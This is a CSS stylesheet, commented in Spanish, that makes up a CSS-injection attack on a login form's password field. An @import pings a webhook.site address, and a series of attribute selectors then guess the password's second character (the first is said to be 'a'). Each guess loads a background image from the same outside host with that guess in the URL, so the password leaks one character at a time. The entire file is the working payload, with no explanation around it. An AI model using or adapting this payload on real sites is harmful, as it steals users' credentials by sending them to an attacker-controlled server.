/* Ping inicial */
@import url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?hit=second_char);

/* Segundo carácter del password (primer carácter ya es "a") */
input[name="password"][value^="aa"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=aa); }
input[name="password"][value^="ab"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=ab); }
input[name="password"][value^="ac"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=ac); }
input[name="password"][value^="ad"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=ad); }
input[name="password"][value^="ae"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=ae); }
input[name="password"][value^="af"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=af); }
input[name="password"][value^="ag"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=ag); }
input[name="password"][value^="ah"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=ah); }
input[name="password"][value^="ai"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=ai); }
input[name="password"][value^="aj"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=aj); }
input[name="password"][value^="ak"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=ak); }
input[name="password"][value^="al"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=al); }
input[name="password"][value^="am"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=am); }
input[name="password"][value^="an"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=an); }
input[name="password"][value^="ao"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=ao); }
input[name="password"][value^="ap"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=ap); }
input[name="password"][value^="aq"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=aq); }
input[name="password"][value^="ar"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=ar); }
input[name="password"][value^="as"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=as); }
input[name="password"][value^="at"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=at); }
input[name="password"][value^="au"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=au); }
input[name="password"][value^="av"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=av); }
input[name="password"][value^="aw"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=aw); }
input[name="password"][value^="ax"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=ax); }
input[name="password"][value^="ay"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=ay); }
input[name="password"][value^="az"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=az); }
input[name="password"][value^="a0"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=a0); }
input[name="password"][value^="a1"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=a1); }
input[name="password"][value^="a2"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=a2); }
input[name="password"][value^="a3"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=a3); }
input[name="password"][value^="a4"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=a4); }
input[name="password"][value^="a5"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=a5); }
input[name="password"][value^="a6"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=a6); }
input[name="password"][value^="a7"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=a7); }
input[name="password"][value^="a8"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=a8); }
input[name="password"][value^="a9"] { background-image:url(//webhook.site/b6cb053d-7966-4b37-b70a-907594c9d554?p=a9); }
